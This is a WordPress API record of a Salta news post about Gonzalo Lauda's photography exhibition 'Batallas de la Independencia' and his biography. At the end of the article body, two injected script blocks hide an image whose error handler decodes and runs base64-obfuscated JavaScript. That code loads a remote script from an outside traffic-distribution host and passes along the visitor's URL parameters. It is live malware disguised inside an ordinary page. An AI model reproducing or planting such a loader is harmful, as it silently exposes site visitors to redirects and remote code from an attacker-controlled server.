{"id":2737,"date":"2023-06-15T11:12:28","date_gmt":"2023-06-15T14:12:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2737"},"modified":"2025-08-14T00:14:56","modified_gmt":"2025-08-14T03:14:56","slug":"el-museo-de-bellas-artes-inaugura-una-muestra-fotografica-que-recrea-las-batallas-de-la-independencia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2737","title":{"rendered":"El Museo de Bellas Artes inaugura una muestra fotogr\u00e1fica que recrea las \u201cBatallas de la Independencia\u201d"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#71052f\"><em>Hoy, a las 20, el Museo de Bellas Artes de Salta dejar\u00e1 inaugurada la muestra \u201cBatallas de la Independencia\u201d de Gonzalo Lauda. En la ocasi\u00f3n se habilitar\u00e1 tambi\u00e9n Stalkenado la Carne de Alex Guerra Hurtado.<\/em><\/h3>\n\n\n\n<p>Con curadur\u00eda de Elisa Solanet, Gonzalo Lauda presenta este proyecto fotogr\u00e1fico. Mediante fotograf\u00eda de gran producci\u00f3n, da vida a esta serie de batallas en donde recrea hitos de la historia de la Independencia Argentina. En una tarea tit\u00e1nica, el artista moviliza al ej\u00e9rcito argentino actual a locaciones especiales para conseguir la toma ideal: movimiento, luz y atm\u00f3sfera juegan un papel clave en cada obra.<\/p>\n\n\n\n<p>Las im\u00e1genes retoman caracter\u00edsticas de la pintura europea de acentos hist\u00f3ricos: el esp\u00edritu rom\u00e1ntico y el poder de la gloria se hacen presentes.<\/p>\n\n\n\n<p>Lauda logra separarse de la cuesti\u00f3n hist\u00f3rica militar y resaltar el esfuerzo, el trabajo, el compa\u00f1erismo. Las expresiones en las tomas m\u00e1s dram\u00e1ticas nos llevan a escuchar gritos y galopes, as\u00ed como percibir momentos de calma en la inmensidad.<\/p>\n\n\n\n<p>Las monta\u00f1as del Cruce de los Andes y la llanura Pampeana, as\u00ed como la presencia del caballo, elemento recurrente en la obra de Gonzalo, son tan protagonistas como los soldados en combate.<\/p>\n\n\n\n<p>Esta serie que se presenta en el Museo Provincial de Bellas Artes de Salta, se compone de 14 obras que recorren el imaginario del fot\u00f3grafo Gonzalo Lauda por las distintas escenas de lo que podr\u00eda haber sido una batalla, entre ellas: Chacabuco, El cruce de los Andes, Lo Gauchos de G\u00fcemes, destaca a su vez la participaci\u00f3n de las mujeres en Batalla, como Remedios del Valle y Juana Azurduy, referentes de nuestra historia.<\/p>\n\n\n\n<p><strong>BIO<\/strong><\/p>\n\n\n\n<p><strong>Gonzalo Lauda (Buenos Aires, 1967)<\/strong><\/p>\n\n\n\n<p>Inici\u00f3 sus estudios de fotograf\u00eda en 1985 junto a P. L. Raota y luego se perfecciona junto a Eduardo Gil y la reconocida artista argentina Fabiana Barreda.<\/p>\n\n\n\n<p>A los 17 a\u00f1os su padre le regala su primera c\u00e1mara: una Minolta K1000, con la que inicia su propio camino de aprendizaje. Su inter\u00e9s por los relieves, fauna y paisajes de su pa\u00eds, lo impulsan a profundizar en la fotograf\u00eda art\u00edstica.<\/p>\n\n\n\n<p>Entre 1990 y 2000 se mete de lleno en el mundo de la fotograf\u00eda de moda. Trabaj\u00f3 para las editoriales m\u00e1s reconocidas y realiz\u00f3 importantes campa\u00f1as. Se consolida en la fotograf\u00eda publicitaria y funda su propia productora, STRUKA donde trabaja para principales marcas.<\/p>\n\n\n\n<p>En 2013 publica \u201cAgua\u201d, donde re\u00fane fotograf\u00edas de horizontes en los que el mar y los lagos de la Patagonia argentina cobran protagonismo. En 2015 viaja a las Islas Malvinas, junto al hijo de un aviador desaparecido en el oc\u00e9ano y como resultado de ese viaje, publica su segundo libro \u201cMalvinas\u201d.<\/p>\n\n\n\n<p>Ese inter\u00e9s por lo hist\u00f3rico, lo lleva desde el 2016, a trabajar en la serie \u201cBatallas de la Independencia\u201d, donde recrea escenas de la historia independentista argentina, en tomas donde dirige la escena hasta lograr la imagen buscada.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-museo-de-bellas-artes-inaugura-una-muestra-fotografica-que-recrea-las-batallas-de-la-independencia-90187\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy, a las 20, el Museo de Bellas Artes de Salta dejar\u00e1 inaugurada la muestra \u201cBatallas de la Independencia\u201d de Gonzalo Lauda. En la ocasi\u00f3n se habilitar\u00e1 tambi\u00e9n Stalkenado la Carne de Alex Guerra Hurtado. Con curadur\u00eda de Elisa Solanet, Gonzalo Lauda presenta este proyecto fotogr\u00e1fico. Mediante fotograf\u00eda de gran producci\u00f3n, da vida a esta [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2738,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-2737","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2737"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2737"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2737\/revisions"}],"predecessor-version":[{"id":7056,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2737\/revisions\/7056"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2738"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2737"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2737"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2737"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}